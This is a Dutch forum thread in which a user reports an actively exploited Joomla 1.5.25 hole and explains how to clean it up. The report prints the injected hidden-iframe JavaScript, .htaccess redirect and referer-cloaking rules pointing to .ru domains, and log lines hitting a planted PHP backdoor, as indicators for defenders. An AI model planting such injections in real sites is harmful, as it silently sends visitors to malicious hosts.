Joomla 1.5.25 actief misbruik

Status
Niet open voor verdere reacties.

sentmen

Gebruiker
Lid geworden
2 sep 2009
Berichten
187
Hallo allemaal,

Ik wil even melden dat er sinds 2 dagen actief een lek word misbruikt in joomla 1.5.25. Waarschijnlijk gaat het om een automatisch procces wat gewoon uiterst gevaarlijk is. Wat het script precies doet is nog niet bekent. Wel weet ik dat het automatisch opnieuw kan uploaden. Updaten naar 1.5.26 zou het probleem grotendeels moeten oplossen. Er worden meerdere russische domeinnamen gebruikt.

Even wat gegevens:
Script word in vrijwel alle javascripts gedropt:
Code:
document.write('<iframe src="http://triphopfifth.ru/browniessignup.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>');

Script word in vrijwel alle .htaccess gedropt:
Code:
RewriteRule ^(.*)$ http://triphopfifth.ru/browniessignup.cgi?8 R=301,L]
ErrorDocument 500 http://triphopfifth.ru/browniessignup.cgi?8

Log van apache2:
Code:
94.242.219.182 - - [08/Nov/2012:02:59:04 +0100] "POST /images/banners/.cache_mit5nt.php HTTP/1.1" 200 563 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
158.255.215.121 - - [08/Nov/2012:10:24:54 +0100] "POST /images/banners/.cache_mit5nt.php HTTP/1.1" 200 563 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"

Rechten worden aangepast naar 611.

Ik heb de volgende methode gebruikt om dit op te lossen:

Maak eerst even een bestand in /images/banners/.cache_mit5nt.php waar je bijvoorbeeld een die neerzet. Vervolgens backup je alle data. Open met je favoriete bestandsbewerker (in mijn geval Notepad++) een bestand en doorzoek de volledige site.

Zoek naar het volgende:
Code:
document.write('<iframe src="http://pageloadlifestyle.ru/disksuitevirusspyware.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>');
Vervang wel even het domein.

Ook in de .htaccess bestanden heeft hij dus bewerkingen gedaan. Zoek daar naar bijvoorbeeld:
Code:
RewriteCond %{HTTP_REFERER} ^.*(duckduckgo|ask|google|dogpile|archive|clusty|mahalo|mywebsearch|blekko|lycos|webcrawler|info|infospace|search|excite|goodsearch|altavista|live|msn|aol|yahoo|youtube|wikipedia|infoseek|bing|facebook|twitter|myspace|linkedin|flickr|deviantart|livejournal|tagged|badoo|mylife|ning|pinterest)\.(.*)

Die .htaccess bestanden even leegmaken. Daarna maak je een update naar Joomla! 1.5.26. Upload alles en pas even alle suber administrators het wachtwoord aan en het wachtwoord van de MySQL gebruiker. Als je ook FTP hebt ingesteld kan je dat ook het beste veranderen.

Groetjes sentmen.
 
Laatst bewerkt:
Sticky gemaakt :)
 
Sticky gemaakt :)

Bedankt voor de stickie. Als er leden zijn die dit probleem ook hebben zou ik het graag willen weten m.b.t. het onderzoek. Dit kan door een reactie te plaatsen hier.
 
Laatst bewerkt door een moderator:
Ter aanvulling:
Joomla! 1.5 wordt niet meer ondersteund met updates.
Misschien dat dit lek is gedicht in Joomla! 1.5.26?

Zo niet dan is het aan te raden om te migreren naar Joomla! 2.5 of 3.x

Groeten,
Niels
 
Ter aanvulling:
Joomla! 1.5 wordt niet meer ondersteund met updates.
Misschien dat dit lek is gedicht in Joomla! 1.5.26?

Zo niet dan is het aan te raden om te migreren naar Joomla! 2.5 of 3.x

Groeten,
/QUOTE]

Wat is de aanvulling? Er staat toch al in dat Joomla! 1.5.26 het probleem moet oplossen? Daarbij heb je ook het probleem met 2.5 dat het geen update is maar een migratie. Daar zit veel werk in en is niet voor iedereen zo klaar gelegd.

Groetjes Sentmen.
 
Laatst bewerkt door een moderator:
De aanvulling is dat het hier over een oudere versie van 1.5 gaat en niet de nieuwste versie.
Deze bug is waarschijnlijk verholpen in 1.5.26.
 
Waarom moet dit bericht nog steeds als sticky bovenaan staan?
Joomla! 1.5 wordt al lang en breed niet meer ondersteund, we zijn al bij versie 3.4.1!!!
 
Goed punt :thumb: ik heb hem losgeweekt ;)
 
Laatst bewerkt door een moderator:
Status
Niet open voor verdere reacties.
Steun Ons

Nieuwste berichten

Terug
Bovenaan Onderaan